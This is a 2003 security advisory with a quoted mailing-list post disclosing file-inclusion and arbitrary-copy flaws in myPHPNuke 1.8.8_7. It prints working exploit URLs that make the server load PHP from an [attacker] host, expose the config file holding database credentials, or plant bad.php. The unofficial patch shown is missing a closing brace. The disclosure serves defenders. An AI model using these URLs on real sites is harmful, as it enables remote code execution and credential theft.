myPHPNuke 'displayCategory.php' Include File Flaw Lets Remote Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1007681
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Sep 11 2003
|
Impact: Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 1.8.8_7
|
Description: Several vulnerabilities were reported in myPHPNuke. A remote user can execute arbitrary PHP code, including operating system commands, on the target system.
Frog-m@n reported that there is an include file vulnerability in 'gallery/displayCategory.php'. The script reportedly includes two
PHP scripts without ensuring that the proper files are included. A remote user can specify an alternate location for the include
files to cause the system to include and execute arbitrary PHP code, including operating system commands. The code will execute
with the privileges of the target web server.
The vulnerable include statements are:
include ("$basepath/imageFunctions.php");
include
("$adminpath/fileFunctions.php");
Some demonstration exploit URLs that will include and execute the 'imageFunctions.php' and
'fileFunctions.php' scripts (respectively) on the 'attacker' computer are provided:
http://[target]/gallery/displayCategory.php?basepath=http://[attacker]
http://[target]/gallery/displayCategory.php?adminpath=http://[attacker]
It is also reported that the OpenTable() function
in the 'mailattach.php' script attaches a file without validating the user-specified file names. A remote user can, for example,
copy some files on the system to a location where the file can be viewed via the web server. A demonstration exploit URL is provided:
http://[target]/mailattach.php?s
ubmit=1&attach1=admin/original/config.php&attach1_name=../DBInfos.txt
This demonstration exploit URL reportedly will cause the
system to copy the file admin/original/config.php so that the file can be accessed with the following URL:
http://[target]/DBInfos.txt
This
flaw can also be exploited to copy arbitrary PHP code to locations on the web server. A demonstration exploit URL is provided:
http://[target]/mailattach.php?submit=1
&attach1=http://[attacker]/bad.txt&attach1_name=../bad.php
|
Impact: A remote user can view some files on the system with the privileges of the web server.
A remote user can include and execute arbitrary
PHP code (including operating system commands) on the system. The code will run with the privileges of the web server.
|
Solution: No solution was available at the time of this entry.
An unofficial patch is available in the Source Message.
|
Vendor URL: www.myphpnuke.com/ (Links to External Site)
|
Cause: Access control error, Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: "Frog Man" <leseulfrog@hotmail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 11 Sep 2003 12:14:09 +0200
From: "Frog Man" <leseulfrog@hotmail.com>
Subject: [VulnWatch] myPHPNuke : Copy/Upload/Include Files
|
Informations :
°°°°°°°°°°°°°
Language : PHP
Version : 1.8.8_7
Website : http://www.myphpnuke.com
Problems : - Upload/Copy/Include Files
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
gallery/displayCategory.php :
------------------------------------------
[...]
<?php
include ("$basepath/imageFunctions.php");
include ("$adminpath/fileFunctions.php");
------------------------------------------
mailattach.php :
-----------------------------------------------------
[...]
<?
OpenTable();
global $attachmentdir;
$attchfile = $attachmentdir.$attach1_name;
if(isset($submit) ) {
if ($attach1_name != "") {
copy("$attach1", $attchfile)
or die("Couldn't copy the file!");
echo "<script> attach();</script>";
} else {
die("No input file specified");
}
echo "<script> attach(); </script>";
} else {
?>
[...]
-----------------------------------------------------
Exploits :
°°°°°°°°
- http://[target]/gallery/displayCategory.php?basepath=http://[attacker]
will include the file :
http://[attacker]/imageFunctions.php
- http://[target]/gallery/displayCategory.php?adminpath=http://[attacker]
will include the file :
http://[attacker]/fileFunctions.php
-
http://[target]/mailattach.php?submit=1&attach1=admin/original/config.php&attach1_name=../DBI
nfos.txt
will copy the file admin/original/config.php (with DB Informations) into
http://[target]/DBInfos.txt .
-
http://[target]/mailattach.php?submit=1&attach1=http://[attacker]/bad.txt&attach1_name=../bad
.php
will copy the file bad.txt into http://[target]/bad.php
- etc...
Solution :
°°°°°°°°°
A patch can be found on http://www.phpsecure.info.
In gallery/displayCategory.php, add before all lines the lines :
-------------------------------------------------------------------
if (isset($_REQUEST["basepath"]) OR isset($_REQUEST["adminpath"])){
die("Patched.");
-------------------------------------------------------------------
And in mailattach.php, add just after the lines :
-------------------------
[...]
<?
OpenTable();
global $attachmentdir;
[...]
-------------------------
the lines :
-----------------------------------------------------------------------------------------------------
------------------------------------------------------
if (isset($_REQUEST["attach1_type"]) OR isset($_REQUEST["attach1_name"])
OR ereg("/",$attach1) OR ereg("\.\.",$attach1) OR ereg(".php",$attach1_
name)
){
die("Patched.");
}
-----------------------------------------------------------------------------------------------------
------------------------------------------------------
More Details :
°°°°°°°°°°°°
In french :
http://www.phpsecure.info/v2/tutos/myPHPNuke.txt
frog-m@n (http://www.phpsecure.info)
_________________________________________________________________
|
|
